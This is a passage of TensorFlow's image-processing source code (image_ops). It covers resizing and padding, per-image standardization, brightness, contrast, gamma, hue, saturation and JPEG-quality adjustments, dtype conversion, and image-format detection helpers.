is_batch = True
if image_shape.ndims == 3:
is_batch = False
image = array_ops.expand_dims(image, 0)
elif image_shape.ndims is None:
is_batch = False
image = array_ops.expand_dims(image, 0)
image.set_shape([None] * 4)
elif image_shape.ndims != 4:
raise ValueError('\'image\' must have either 3 or 4 dimensions.')
assert_ops = _CheckAtLeast3DImage(image, require_static=False)
assert_ops += _assert(target_width > 0, ValueError,
'target_width must be > 0.')
assert_ops += _assert(target_height > 0, ValueError,
'target_height must be > 0.')
image = control_flow_ops.with_dependencies(assert_ops, image)
# `crop_to_bounding_box` and `pad_to_bounding_box` have their own checks.
# Make sure our checks come first, so that error messages are clearer.
if _is_tensor(target_height):
target_height = control_flow_ops.with_dependencies(
assert_ops, target_height)
if _is_tensor(target_width):
target_width = control_flow_ops.with_dependencies(assert_ops,
target_width)
def max_(x, y):
if _is_tensor(x) or _is_tensor(y):
return math_ops.maximum(x, y)
else:
return max(x, y)
def min_(x, y):
if _is_tensor(x) or _is_tensor(y):
return math_ops.minimum(x, y)
else:
return min(x, y)
def equal_(x, y):
if _is_tensor(x) or _is_tensor(y):
return math_ops.equal(x, y)
else:
return x == y
_, height, width, _ = _ImageDimensions(image, rank=4)
width_diff = target_width - width
offset_crop_width = max_(-width_diff // 2, 0)
offset_pad_width = max_(width_diff // 2, 0)
height_diff = target_height - height
offset_crop_height = max_(-height_diff // 2, 0)
offset_pad_height = max_(height_diff // 2, 0)
# Maybe crop if needed.
cropped = crop_to_bounding_box(image, offset_crop_height, offset_crop_width,
min_(target_height, height),
min_(target_width, width))
# Maybe pad if needed.
resized = pad_to_bounding_box(cropped, offset_pad_height, offset_pad_width,
target_height, target_width)
# In theory all the checks below are redundant.
if resized.get_shape().ndims is None:
raise ValueError('resized contains no shape.')
_, resized_height, resized_width, _ = _ImageDimensions(resized, rank=4)
assert_ops = []
assert_ops += _assert(
equal_(resized_height, target_height), ValueError,
'resized height is not correct.')
assert_ops += _assert(
equal_(resized_width, target_width), ValueError,
'resized width is not correct.')
resized = control_flow_ops.with_dependencies(assert_ops, resized)
if not is_batch:
resized = array_ops.squeeze(resized, axis=[0])
return resized
@tf_export('image.ResizeMethod')
class ResizeMethod(object):
BILINEAR = 0
NEAREST_NEIGHBOR = 1
BICUBIC = 2
AREA = 3
@tf_export(v1=['image.resize_images', 'image.resize'])
def resize_images(images,
size,
method=ResizeMethod.BILINEAR,
align_corners=False,
preserve_aspect_ratio=False):
return resize_images_v2(
images=images,
size=size,
method=method,
align_corners=align_corners,
preserve_aspect_ratio=preserve_aspect_ratio,
name=None)
@tf_export('image.resize', v1=[])
def resize_images_v2(images,
size,
method=ResizeMethod.BILINEAR,
align_corners=False,
preserve_aspect_ratio=False,
name=None):
"""Resize `images` to `size` using the specified `method`.
Resized images will be distorted if their original aspect ratio is not
the same as `size`. To avoid distortions see
`tf.image.resize_image_with_pad`.
`method` can be one of:
* <b>`ResizeMethod.BILINEAR`</b>: [Bilinear interpolation.](
https://en.wikipedia.org/wiki/Bilinear_interpolation)
* <b>`ResizeMethod.NEAREST_NEIGHBOR`</b>: [Nearest neighbor interpolation.](
https://en.wikipedia.org/wiki/Nearest-neighbor_interpolation)
* <b>`ResizeMethod.BICUBIC`</b>: [Bicubic interpolation.](
https://en.wikipedia.org/wiki/Bicubic_interpolation)
* <b>`ResizeMethod.AREA`</b>: Area interpolation.
The return value has the same type as `images` if `method` is
`ResizeMethod.NEAREST_NEIGHBOR`. It will also have the same type as `images`
if the size of `images` can be statically determined to be the same as `size`,
because `images` is returned in this case. Otherwise, the return value has
type `float32`.
Args:
images: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
size: A 1-D int32 Tensor of 2 elements: `new_height, new_width`. The
new size for the images.
method: ResizeMethod. Defaults to `ResizeMethod.BILINEAR`.
align_corners: bool. If True, the centers of the 4 corner pixels of the
input and output tensors are aligned, preserving the values at the
corner pixels. Defaults to `False`.
preserve_aspect_ratio: Whether to preserve the aspect ratio. If this is set,
then `images` will be resized to a size that fits in `size` while
preserving the aspect ratio of the original image. Scales up the image if
`size` is bigger than the current size of the `image`. Defaults to False.
name: A name for this operation (optional).
Raises:
ValueError: if the shape of `images` is incompatible with the
shape arguments to this function
ValueError: if `size` has invalid shape or type.
ValueError: if an unsupported resize method is specified.
Returns:
If `images` was 4-D, a 4-D float Tensor of shape
`[batch, new_height, new_width, channels]`.
If `images` was 3-D, a 3-D float Tensor of shape
`[new_height, new_width, channels]`.
"""
with ops.name_scope(name, 'resize', [images, size]):
images = ops.convert_to_tensor(images, name='images')
if images.get_shape().ndims is None:
raise ValueError('\'images\' contains no shape.')
# TODO(shlens): Migrate this functionality to the underlying Op's.
is_batch = True
if images.get_shape().ndims == 3:
is_batch = False
images = array_ops.expand_dims(images, 0)
elif images.get_shape().ndims != 4:
raise ValueError('\'images\' must have either 3 or 4 dimensions.')
_, height, width, _ = images.get_shape().as_list()
try:
size = ops.convert_to_tensor(size, dtypes.int32, name='size')
except (TypeError, ValueError):
raise ValueError('\'size\' must be a 1-D int32 Tensor')
if not size.get_shape().is_compatible_with([2]):
raise ValueError('\'size\' must be a 1-D Tensor of 2 elements: '
'new_height, new_width')
size_const_as_shape = tensor_util.constant_value_as_shape(size)
new_height_const = size_const_as_shape.dims[0].value
new_width_const = size_const_as_shape.dims[1].value
if preserve_aspect_ratio:
# Get the current shapes of the image, even if dynamic.
_, current_height, current_width, _ = _ImageDimensions(images, rank=4)
# do the computation to find the right scale and height/width.
scale_factor_height = (math_ops.to_float(new_height_const) /
math_ops.to_float(current_height))
scale_factor_width = (math_ops.to_float(new_width_const) /
math_ops.to_float(current_width))
scale_factor = math_ops.minimum(scale_factor_height, scale_factor_width)
scaled_height_const = math_ops.to_int32(
math_ops.round(scale_factor * math_ops.to_float(current_height)))
scaled_width_const = math_ops.to_int32(
math_ops.round(scale_factor * math_ops.to_float(current_width)))
# NOTE: Reset the size and other constants used later.
size = ops.convert_to_tensor([scaled_height_const, scaled_width_const],
dtypes.int32, name='size')
size_const_as_shape = tensor_util.constant_value_as_shape(size)
new_height_const = size_const_as_shape.dims[0].value
new_width_const = size_const_as_shape.dims[1].value
# If we can determine that the height and width will be unmodified by this
# transformation, we avoid performing the resize.
if all(x is not None
for x in [new_width_const, width, new_height_const, height]) and (
width == new_width_const and height == new_height_const):
if not is_batch:
images = array_ops.squeeze(images, axis=[0])
return images
if method == ResizeMethod.BILINEAR:
images = gen_image_ops.resize_bilinear(
images, size, align_corners=align_corners)
elif method == ResizeMethod.NEAREST_NEIGHBOR:
images = gen_image_ops.resize_nearest_neighbor(
images, size, align_corners=align_corners)
elif method == ResizeMethod.BICUBIC:
images = gen_image_ops.resize_bicubic(
images, size, align_corners=align_corners)
elif method == ResizeMethod.AREA:
images = gen_image_ops.resize_area(
images, size, align_corners=align_corners)
else:
raise ValueError('Resize method is not implemented.')
# NOTE(mrry): The shape functions for the resize ops cannot unpack
# the packed values in `new_size`, so set the shape here.
images.set_shape([None, new_height_const, new_width_const, None])
if not is_batch:
images = array_ops.squeeze(images, axis=[0])
return images
@tf_export('image.resize_image_with_pad')
def resize_image_with_pad(image,
target_height,
target_width,
method=ResizeMethod.BILINEAR):
"""Resizes and pads an image to a target width and height.
Resizes an image to a target width and height by keeping
the aspect ratio the same without distortion. If the target
dimensions don't match the image dimensions, the image
is resized and then padded with zeroes to match requested
dimensions.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
target_height: Target height.
target_width: Target width.
method: Method to use for resizing image. See `resize_images()`
Raises:
ValueError: if `target_height` or `target_width` are zero or negative.
Returns:
Resized and padded image.
If `images` was 4-D, a 4-D float Tensor of shape
`[batch, new_height, new_width, channels]`.
If `images` was 3-D, a 3-D float Tensor of shape
`[new_height, new_width, channels]`.
"""
with ops.name_scope(None, 'resize_image_with_pad', [image]):
image = ops.convert_to_tensor(image, name='image')
image_shape = image.get_shape()
is_batch = True
if image_shape.ndims == 3:
is_batch = False
image = array_ops.expand_dims(image, 0)
elif image_shape.ndims is None:
is_batch = False
image = array_ops.expand_dims(image, 0)
image.set_shape([None] * 4)
elif image_shape.ndims != 4:
raise ValueError('\'image\' must have either 3 or 4 dimensions.')
assert_ops = _CheckAtLeast3DImage(image, require_static=False)
assert_ops += _assert(target_width > 0, ValueError,
'target_width must be > 0.')
assert_ops += _assert(target_height > 0, ValueError,
'target_height must be > 0.')
image = control_flow_ops.with_dependencies(assert_ops, image)
def max_(x, y):
if _is_tensor(x) or _is_tensor(y):
return math_ops.maximum(x, y)
else:
return max(x, y)
_, height, width, _ = _ImageDimensions(image, rank=4)
# convert values to float, to ease divisions
f_height = math_ops.cast(height, dtype=dtypes.float64)
f_width = math_ops.cast(width, dtype=dtypes.float64)
f_target_height = math_ops.cast(target_height, dtype=dtypes.float64)
f_target_width = math_ops.cast(target_width, dtype=dtypes.float64)
# Find the ratio by which the image must be adjusted
# to fit within the target
ratio = max_(f_width / f_target_width, f_height / f_target_height)
resized_height_float = f_height / ratio
resized_width_float = f_width / ratio
resized_height = math_ops.cast(
math_ops.floor(resized_height_float), dtype=dtypes.int32)
resized_width = math_ops.cast(
math_ops.floor(resized_width_float), dtype=dtypes.int32)
padding_height = (f_target_height - resized_height_float) / 2
padding_width = (f_target_width - resized_width_float) / 2
f_padding_height = math_ops.floor(padding_height)
f_padding_width = math_ops.floor(padding_width)
p_height = max_(0, math_ops.cast(f_padding_height, dtype=dtypes.int32))
p_width = max_(0, math_ops.cast(f_padding_width, dtype=dtypes.int32))
# Resize first, then pad to meet requested dimensions
resized = resize_images(image, [resized_height, resized_width], method)
padded = pad_to_bounding_box(resized, p_height, p_width, target_height,
target_width)
if padded.get_shape().ndims is None:
raise ValueError('padded contains no shape.')
_ImageDimensions(padded, rank=4)
if not is_batch:
padded = array_ops.squeeze(padded, axis=[0])
return padded
@tf_export('image.per_image_standardization')
def per_image_standardization(image):
"""Linearly scales `image` to have zero mean and unit variance.
This op computes `(x - mean) / adjusted_stddev`, where `mean` is the average
of all values in image, and
`adjusted_stddev = max(stddev, 1.0/sqrt(image.NumElements()))`.
`stddev` is the standard deviation of all values in `image`. It is capped
away from zero to protect against division by 0 when handling uniform images.
Args:
image: An n-D Tensor where the last 3 dimensions are
`[height, width, channels]`.
Returns:
The standardized image with same shape as `image`.
Raises:
ValueError: if the shape of 'image' is incompatible with this function.
"""
with ops.name_scope(None, 'per_image_standardization', [image]) as scope:
image = ops.convert_to_tensor(image, name='image')
image = _AssertAtLeast3DImage(image)
num_pixels = math_ops.reduce_prod(array_ops.shape(image)[-3:])
image = math_ops.cast(image, dtype=dtypes.float32)
image_mean = math_ops.reduce_mean(image, axis=[-1, -2, -3], keepdims=True)
variance = (
math_ops.reduce_mean(
math_ops.square(image), axis=[-1, -2, -3], keepdims=True) -
math_ops.square(image_mean))
variance = gen_nn_ops.relu(variance)
stddev = math_ops.sqrt(variance)
# Apply a minimum normalization that protects us against uniform images.
min_stddev = math_ops.rsqrt(math_ops.cast(num_pixels, dtypes.float32))
pixel_value_scale = math_ops.maximum(stddev, min_stddev)
pixel_value_offset = image_mean
image = math_ops.subtract(image, pixel_value_offset)
image = math_ops.div(image, pixel_value_scale, name=scope)
return image
@tf_export('image.random_brightness')
def random_brightness(image, max_delta, seed=None):
"""Adjust the brightness of images by a random factor.
Equivalent to `adjust_brightness()` using a `delta` randomly picked in the
interval `[-max_delta, max_delta)`.
Args:
image: An image or images to adjust.
max_delta: float, must be non-negative.
seed: A Python integer. Used to create a random seed. See
`tf.set_random_seed`
for behavior.
Returns:
The brightness-adjusted image(s).
Raises:
ValueError: if `max_delta` is negative.
"""
if max_delta < 0:
raise ValueError('max_delta must be non-negative.')
delta = random_ops.random_uniform([], -max_delta, max_delta, seed=seed)
return adjust_brightness(image, delta)
@tf_export('image.random_contrast')
def random_contrast(image, lower, upper, seed=None):
"""Adjust the contrast of an image or images by a random factor.
Equivalent to `adjust_contrast()` but uses a `contrast_factor` randomly
picked in the interval `[lower, upper]`.
Args:
image: An image tensor with 3 or more dimensions.
lower: float. Lower bound for the random contrast factor.
upper: float. Upper bound for the random contrast factor.
seed: A Python integer. Used to create a random seed. See
`tf.set_random_seed` for behavior.
Returns:
The contrast-adjusted image(s).
Raises:
ValueError: if `upper <= lower` or if `lower < 0`.
"""
if upper <= lower:
raise ValueError('upper must be > lower.')
if lower < 0:
raise ValueError('lower must be non-negative.')
# Generate an a float in [lower, upper]
contrast_factor = random_ops.random_uniform([], lower, upper, seed=seed)
return adjust_contrast(image, contrast_factor)
@tf_export('image.adjust_brightness')
def adjust_brightness(image, delta):
"""Adjust the brightness of RGB or Grayscale images.
This is a convenience method that converts RGB images to float
representation, adjusts their brightness, and then converts them back to the
original data type. If several adjustments are chained, it is advisable to
minimize the number of redundant conversions.
The value `delta` is added to all components of the tensor `image`. `image` is
converted to `float` and scaled appropriately if it is in fixed-point
representation, and `delta` is converted to the same data type. For regular
images, `delta` should be in the range `[0,1)`, as it is added to the image in
floating point representation, where pixel values are in the `[0,1)` range.
Args:
image: RGB image or images to adjust.
delta: A scalar. Amount to add to the pixel values.
Returns:
A brightness-adjusted tensor of the same shape and type as `image`.
"""
with ops.name_scope(None, 'adjust_brightness', [image, delta]) as name:
image = ops.convert_to_tensor(image, name='image')
# Remember original dtype to so we can convert back if needed
orig_dtype = image.dtype
if orig_dtype in [dtypes.float16, dtypes.float32]:
flt_image = image
else:
flt_image = convert_image_dtype(image, dtypes.float32)
adjusted = math_ops.add(
flt_image, math_ops.cast(delta, flt_image.dtype), name=name)
return convert_image_dtype(adjusted, orig_dtype, saturate=True)
@tf_export('image.adjust_contrast')
def adjust_contrast(images, contrast_factor):
"""Adjust contrast of RGB or grayscale images.
This is a convenience method that converts RGB images to float
representation, adjusts their contrast, and then converts them back to the
original data type. If several adjustments are chained, it is advisable to
minimize the number of redundant conversions.
`images` is a tensor of at least 3 dimensions. The last 3 dimensions are
interpreted as `[height, width, channels]`. The other dimensions only
represent a collection of images, such as `[batch, height, width, channels].`
Contrast is adjusted independently for each channel of each image.
For each channel, this Op computes the mean of the image pixels in the
channel and then adjusts each component `x` of each pixel to
`(x - mean) * contrast_factor + mean`.
Args:
images: Images to adjust. At least 3-D.
contrast_factor: A float multiplier for adjusting contrast.
Returns:
The contrast-adjusted image or images.
"""
with ops.name_scope(None, 'adjust_contrast',
[images, contrast_factor]) as name:
images = ops.convert_to_tensor(images, name='images')
# Remember original dtype to so we can convert back if needed
orig_dtype = images.dtype
if orig_dtype in (dtypes.float16, dtypes.float32):
flt_images = images
else:
flt_images = convert_image_dtype(images, dtypes.float32)
adjusted = gen_image_ops.adjust_contrastv2(
flt_images, contrast_factor=contrast_factor, name=name)
return convert_image_dtype(adjusted, orig_dtype, saturate=True)
@tf_export('image.adjust_gamma')
def adjust_gamma(image, gamma=1, gain=1):
"""Performs Gamma Correction on the input image.
Also known as Power Law Transform. This function transforms the
input image pixelwise according to the equation `Out = In**gamma`
after scaling each pixel to the range 0 to 1.
Args:
image : A Tensor.
gamma : A scalar or tensor. Non negative real number.
gain : A scalar or tensor. The constant multiplier.
Returns:
A Tensor. Gamma corrected output image.
Raises:
ValueError: If gamma is negative.
Notes:
For gamma greater than 1, the histogram will shift towards left and
the output image will be darker than the input image.
For gamma less than 1, the histogram will shift towards right and
the output image will be brighter than the input image.
References:
[1] http://en.wikipedia.org/wiki/Gamma_correction
"""
with ops.name_scope(None, 'adjust_gamma', [image, gamma, gain]) as name:
# Convert pixel value to DT_FLOAT for computing adjusted image.
img = ops.convert_to_tensor(image, name='img', dtype=dtypes.float32)
# Keep image dtype for computing the scale of corresponding dtype.
image = ops.convert_to_tensor(image, name='image')
assert_op = _assert(gamma >= 0, ValueError,
'Gamma should be a non-negative real number.')
if assert_op:
gamma = control_flow_ops.with_dependencies(assert_op, gamma)
# scale = max(dtype) - min(dtype).
scale = constant_op.constant(
image.dtype.limits[1] - image.dtype.limits[0], dtype=dtypes.float32)
# According to the definition of gamma correction.
adjusted_img = (img / scale)**gamma * scale * gain
return adjusted_img
@tf_export('image.convert_image_dtype')
def convert_image_dtype(image, dtype, saturate=False, name=None):
"""Convert `image` to `dtype`, scaling its values if needed.
Images that are represented using floating point values are expected to have
values in the range [0,1). Image data stored in integer data types are
expected to have values in the range `[0,MAX]`, where `MAX` is the largest
positive representable number for the data type.
This op converts between data types, scaling the values appropriately before
casting.
Note that converting from floating point inputs to integer types may lead to
over/underflow problems. Set saturate to `True` to avoid such problem in
problematic conversions. If enabled, saturation will clip the output into the
allowed range before performing a potentially dangerous cast (and only before
performing such a cast, i.e., when casting from a floating point to an integer
type, and when casting from a signed to an unsigned type; `saturate` has no
effect on casts between floats, or on casts that increase the type's range).
Args:
image: An image.
dtype: A `DType` to convert `image` to.
saturate: If `True`, clip the input before casting (if necessary).
name: A name for this operation (optional).
Returns:
`image`, converted to `dtype`.
"""
image = ops.convert_to_tensor(image, name='image')
if dtype == image.dtype:
return array_ops.identity(image, name=name)
with ops.name_scope(name, 'convert_image', [image]) as name:
# Both integer: use integer multiplication in the larger range
if image.dtype.is_integer and dtype.is_integer:
scale_in = image.dtype.max
scale_out = dtype.max
if scale_in > scale_out:
# Scaling down, scale first, then cast. The scaling factor will
# cause in.max to be mapped to above out.max but below out.max+1,
# so that the output is safely in the supported range.
scale = (scale_in + 1) // (scale_out + 1)
scaled = math_ops.div(image, scale)
if saturate:
return math_ops.saturate_cast(scaled, dtype, name=name)
else:
return math_ops.cast(scaled, dtype, name=name)
else:
# Scaling up, cast first, then scale. The scale will not map in.max to
# out.max, but converting back and forth should result in no change.
if saturate:
cast = math_ops.saturate_cast(image, dtype)
else:
cast = math_ops.cast(image, dtype)
scale = (scale_out + 1) // (scale_in + 1)
return math_ops.multiply(cast, scale, name=name)
elif image.dtype.is_floating and dtype.is_floating:
# Both float: Just cast, no possible overflows in the allowed ranges.
# Note: We're ignoreing float overflows. If your image dynamic range
# exceeds float range you're on your own.
return math_ops.cast(image, dtype, name=name)
else:
if image.dtype.is_integer:
# Converting to float: first cast, then scale. No saturation possible.
cast = math_ops.cast(image, dtype)
scale = 1. / image.dtype.max
return math_ops.multiply(cast, scale, name=name)
else:
# Converting from float: first scale, then cast
scale = dtype.max + 0.5 # avoid rounding problems in the cast
scaled = math_ops.multiply(image, scale)
if saturate:
return math_ops.saturate_cast(scaled, dtype, name=name)
else:
return math_ops.cast(scaled, dtype, name=name)
@tf_export('image.rgb_to_grayscale')
def rgb_to_grayscale(images, name=None):
"""Converts one or more images from RGB to Grayscale.
Outputs a tensor of the same `DType` and rank as `images`. The size of the
last dimension of the output is 1, containing the Grayscale value of the
pixels.
Args:
images: The RGB tensor to convert. Last dimension must have size 3 and
should contain RGB values.
name: A name for the operation (optional).
Returns:
The converted grayscale image(s).
"""
with ops.name_scope(name, 'rgb_to_grayscale', [images]) as name:
images = ops.convert_to_tensor(images, name='images')
# Remember original dtype to so we can convert back if needed
orig_dtype = images.dtype
flt_image = convert_image_dtype(images, dtypes.float32)
# Reference for converting between RGB and grayscale.
# https://en.wikipedia.org/wiki/Luma_%28video%29
rgb_weights = [0.2989, 0.5870, 0.1140]
gray_float = math_ops.tensordot(flt_image, rgb_weights, [-1, -1])
gray_float = array_ops.expand_dims(gray_float, -1)
return convert_image_dtype(gray_float, orig_dtype, name=name)
@tf_export('image.grayscale_to_rgb')
def grayscale_to_rgb(images, name=None):
"""Converts one or more images from Grayscale to RGB.
Outputs a tensor of the same `DType` and rank as `images`. The size of the
last dimension of the output is 3, containing the RGB value of the pixels.
Args:
images: The Grayscale tensor to convert. Last dimension must be size 1.
name: A name for the operation (optional).
Returns:
The converted grayscale image(s).
"""
with ops.name_scope(name, 'grayscale_to_rgb', [images]) as name:
images = ops.convert_to_tensor(images, name='images')
rank_1 = array_ops.expand_dims(array_ops.rank(images) - 1, 0)
shape_list = ([array_ops.ones(rank_1, dtype=dtypes.int32)] +
[array_ops.expand_dims(3, 0)])
multiples = array_ops.concat(shape_list, 0)
rgb = array_ops.tile(images, multiples, name=name)
rgb.set_shape(images.get_shape()[:-1].concatenate([3]))
return rgb
# pylint: disable=invalid-name
@tf_export('image.random_hue')
def random_hue(image, max_delta, seed=None):
"""Adjust the hue of RGB images by a random factor.
Equivalent to `adjust_hue()` but uses a `delta` randomly
picked in the interval `[-max_delta, max_delta]`.
`max_delta` must be in the interval `[0, 0.5]`.
Args:
image: RGB image or images. Size of the last dimension must be 3.
max_delta: float. Maximum value for the random delta.
seed: An operation-specific seed. It will be used in conjunction with the
graph-level seed to determine the real seeds that will be used in this
operation. Please see the documentation of set_random_seed for its
interaction with the graph-level random seed.
Returns:
Adjusted image(s), same shape and DType as `image`.
Raises:
ValueError: if `max_delta` is invalid.
"""
if max_delta > 0.5:
raise ValueError('max_delta must be <= 0.5.')
if max_delta < 0:
raise ValueError('max_delta must be non-negative.')
delta = random_ops.random_uniform([], -max_delta, max_delta, seed=seed)
return adjust_hue(image, delta)
@tf_export('image.adjust_hue')
def adjust_hue(image, delta, name=None):
"""Adjust hue of RGB images.
This is a convenience method that converts an RGB image to float
representation, converts it to HSV, add an offset to the hue channel, converts
back to RGB and then back to the original data type. If several adjustments
are chained it is advisable to minimize the number of redundant conversions.
`image` is an RGB image. The image hue is adjusted by converting the
image(s) to HSV and rotating the hue channel (H) by
`delta`. The image is then converted back to RGB.
`delta` must be in the interval `[-1, 1]`.
Args:
image: RGB image or images. Size of the last dimension must be 3.
delta: float. How much to add to the hue channel.
name: A name for this operation (optional).
Returns:
Adjusted image(s), same shape and DType as `image`.
"""
with ops.name_scope(name, 'adjust_hue', [image]) as name:
image = ops.convert_to_tensor(image, name='image')
# Remember original dtype to so we can convert back if needed
orig_dtype = image.dtype
if orig_dtype in (dtypes.float16, dtypes.float32):
flt_image = image
else:
flt_image = convert_image_dtype(image, dtypes.float32)
rgb_altered = gen_image_ops.adjust_hue(flt_image, delta)
return convert_image_dtype(rgb_altered, orig_dtype)
# pylint: disable=invalid-name
@tf_export('image.random_jpeg_quality')
def random_jpeg_quality(image, min_jpeg_quality, max_jpeg_quality, seed=None):
"""Randomly changes jpeg encoding quality for inducing jpeg noise.
`min_jpeg_quality` must be in the interval `[0, 100]` and less than
`max_jpeg_quality`.
`max_jpeg_quality` must be in the interval `[0, 100]`.
Args:
image: RGB image or images. Size of the last dimension must be 3.
min_jpeg_quality: Minimum jpeg encoding quality to use.
max_jpeg_quality: Maximum jpeg encoding quality to use.
seed: An operation-specific seed. It will be used in conjunction
with the graph-level seed to determine the real seeds that will be
used in this operation. Please see the documentation of
set_random_seed for its interaction with the graph-level random seed.
Returns:
Adjusted image(s), same shape and DType as `image`.
Raises:
ValueError: if `min_jpeg_quality` or `max_jpeg_quality` is invalid.
"""
if (min_jpeg_quality < 0 or max_jpeg_quality < 0 or
min_jpeg_quality > 100 or max_jpeg_quality > 100):
raise ValueError('jpeg encoding range must be between 0 and 100.')
if min_jpeg_quality >= max_jpeg_quality:
raise ValueError('`min_jpeg_quality` must be less than `max_jpeg_quality`.')
np.random.seed(seed)
jpeg_quality = np.random.randint(min_jpeg_quality, max_jpeg_quality)
return adjust_jpeg_quality(image, jpeg_quality)
@tf_export('image.adjust_jpeg_quality')
def adjust_jpeg_quality(image, jpeg_quality, name=None):
"""Adjust jpeg encoding quality of an RGB image.
This is a convenience method that adjusts jpeg encoding quality of an
RGB image.
`image` is an RGB image. The image's encoding quality is adjusted
to `jpeg_quality`.
`jpeg_quality` must be in the interval `[0, 100]`.
Args:
image: RGB image or images. Size of the last dimension must be 3.
jpeg_quality: int. jpeg encoding quality.
name: A name for this operation (optional).
Returns:
Adjusted image(s), same shape and DType as `image`.
"""
with ops.name_scope(name, 'adjust_jpeg_quality', [image]) as name:
image = ops.convert_to_tensor(image, name='image')
# Remember original dtype to so we can convert back if needed
orig_dtype = image.dtype
# Convert to uint8
image = convert_image_dtype(image, dtypes.uint8)
# Encode image to jpeg with given jpeg quality
image = gen_image_ops.encode_jpeg(image, quality=jpeg_quality)
# Decode jpeg image
image = gen_image_ops.decode_jpeg(image)
# Convert back to original dtype and return
return convert_image_dtype(image, orig_dtype)
@tf_export('image.random_saturation')
def random_saturation(image, lower, upper, seed=None):
"""Adjust the saturation of RGB images by a random factor.
Equivalent to `adjust_saturation()` but uses a `saturation_factor` randomly
picked in the interval `[lower, upper]`.
Args:
image: RGB image or images. Size of the last dimension must be 3.
lower: float. Lower bound for the random saturation factor.
upper: float. Upper bound for the random saturation factor.
seed: An operation-specific seed. It will be used in conjunction with the
graph-level seed to determine the real seeds that will be used in this
operation. Please see the documentation of set_random_seed for its
interaction with the graph-level random seed.
Returns:
Adjusted image(s), same shape and DType as `image`.
Raises:
ValueError: if `upper <= lower` or if `lower < 0`.
"""
if upper <= lower:
raise ValueError('upper must be > lower.')
if lower < 0:
raise ValueError('lower must be non-negative.')
# Pick a float in [lower, upper]
saturation_factor = random_ops.random_uniform([], lower, upper, seed=seed)
return adjust_saturation(image, saturation_factor)
@tf_export('image.adjust_saturation')
def adjust_saturation(image, saturation_factor, name=None):
"""Adjust saturation of RGB images.
This is a convenience method that converts RGB images to float
representation, converts them to HSV, add an offset to the saturation channel,
converts back to RGB and then back to the original data type. If several
adjustments are chained it is advisable to minimize the number of redundant
conversions.
`image` is an RGB image or images. The image saturation is adjusted by
converting the images to HSV and multiplying the saturation (S) channel by
`saturation_factor` and clipping. The images are then converted back to RGB.
Args:
image: RGB image or images. Size of the last dimension must be 3.
saturation_factor: float. Factor to multiply the saturation by.
name: A name for this operation (optional).
Returns:
Adjusted image(s), same shape and DType as `image`.
"""
with ops.name_scope(name, 'adjust_saturation', [image]) as name:
image = ops.convert_to_tensor(image, name='image')
# Remember original dtype to so we can convert back if needed
orig_dtype = image.dtype
if orig_dtype in (dtypes.float16, dtypes.float32):
flt_image = image
else:
flt_image = convert_image_dtype(image, dtypes.float32)
adjusted = gen_image_ops.adjust_saturation(flt_image, saturation_factor)
return convert_image_dtype(adjusted, orig_dtype)
@tf_export('io.is_jpeg', 'image.is_jpeg', v1=['io.is_jpeg', 'image.is_jpeg'])
def is_jpeg(contents, name=None):
r"""Convenience function to check if the 'contents' encodes a JPEG image.
Args:
contents: 0-D `string`. The encoded image bytes.
name: A name for the operation (optional)
Returns:
A scalar boolean tensor indicating if 'contents' may be a JPEG image.
is_jpeg is susceptible to false positives.
"""
# Normal JPEGs start with \xff\xd8\xff\xe0
# JPEG with EXIF stats with \xff\xd8\xff\xe1
# Use \xff\xd8\xff to cover both.
with ops.name_scope(name, 'is_jpeg'):
substr = string_ops.substr(contents, 0, 3)
return math_ops.equal(substr, b'\xff\xd8\xff', name=name)
def _is_png(contents, name=None):
r"""Convenience function to check if the 'contents' encodes a PNG image.
Args:
contents: 0-D `string`. The encoded image bytes.
name: A name for the operation (optional)
Returns:
A scalar boolean tensor indicating if 'contents' may be a PNG image.
is_png is susceptible to false positives.
"""
with ops.name_scope(name, 'is_png'):
substr = string_ops.substr(contents, 0, 3)
return math_ops.equal(substr, b'\211PN', name=name)
tf_export('io.decode_and_crop_jpeg', 'image.decode_and_crop_jpeg',
v1=['io.decode_and_crop_jpeg', 'image.decode_and_crop_jpeg'])(
gen_image_ops.decode_and_crop_jpeg)
tf_export('io.decode_bmp', 'image.decode_bmp',
v1=['io.decode_bmp', 'image.decode_bmp'])(gen_image_ops.decode_bmp)
tf_export('io.decode_gif', 'image.decode_gif',
v1=['io.decode_gif', 'image.decode_gif'])(gen_image_ops.decode_gif)
tf_export('io.decode_jpeg', 'image.decode_jpeg',
v1=['io.decode_jpeg', 'image.decode_jpeg'])(gen_image_ops.decode_jpeg)
tf_export('io.decode_png', 'image.decode_png',
v1=['io.decode_png', 'image.decode_png'])(gen_image_ops.decode_png)
tf_export('io.encode_jpeg', 'image.encode_jpeg',
v1=['io.encode_jpeg', 'image.encode_jpeg'])(gen_image_ops.encode_jpeg)
tf_export('io.extract_jpeg_shape', 'image.extract_jpeg_shape',
v1=['io.extract_jpeg_shape', 'image.extract_jpeg_shape'])(
gen_image_ops.extract_jpeg_shape)
@tf_export('io.decode_image', 'image.decode_image',
v1=['io.decode_image', 'image.decode_image'])
def decode_image(contents, channels=None, dtype=dtypes.uint8, name=None):
"""Convenience function for `decode_bmp`, `decode_gif`, `decode_jpeg`,
and `decode_png`.
Detects whether an image is a BMP, GIF, JPEG, or PNG, and performs the
appropriate operation to convert the input bytes `string` into a `Tensor`
of type `dtype`.
Note: `decode_gif` returns a 4-D array `[num_frames, height, width, 3]`, as
opposed to `decode_bmp`, `decode_jpeg` and `decode_png`, which return 3-D
arrays `[height, width, num_channels]`. Make sure to take this into account
when constructing your graph if you are intermixing GIF files with BMP, JPEG,
and/or PNG files.
Args:
contents: 0-D `string`. The encoded image bytes.
channels: An optional `int`. Defaults to `0`. Number of color channels for
the decoded image.
dtype: The desired DType of the returned `Tensor`.
name: A name for the operation (optional)
Returns:
`Tensor` with type `dtype` and shape `[height, width, num_channels]` for
BMP, JPEG, and PNG images and shape `[num_frames, height, width, 3]` for
GIF images.
Raises:
ValueError: On incorrect number of channels.
"""
with ops.name_scope(name, 'decode_image'):
if channels not in (None, 0, 1, 3, 4):
raise ValueError('channels must be in (None, 0, 1, 3, 4)')
substr = string_ops.substr(contents, 0, 3)
def _bmp():
"""Decodes a GIF image."""
signature = string_ops.substr(contents, 0, 2)
# Create assert op to check that bytes are BMP decodable
is_bmp = math_ops.equal(signature, 'BM', name='is_bmp')
decode_msg = 'Unable to decode bytes as JPEG, PNG, GIF, or BMP'
assert_decode = control_flow_ops.Assert(is_bmp, [decode_msg])
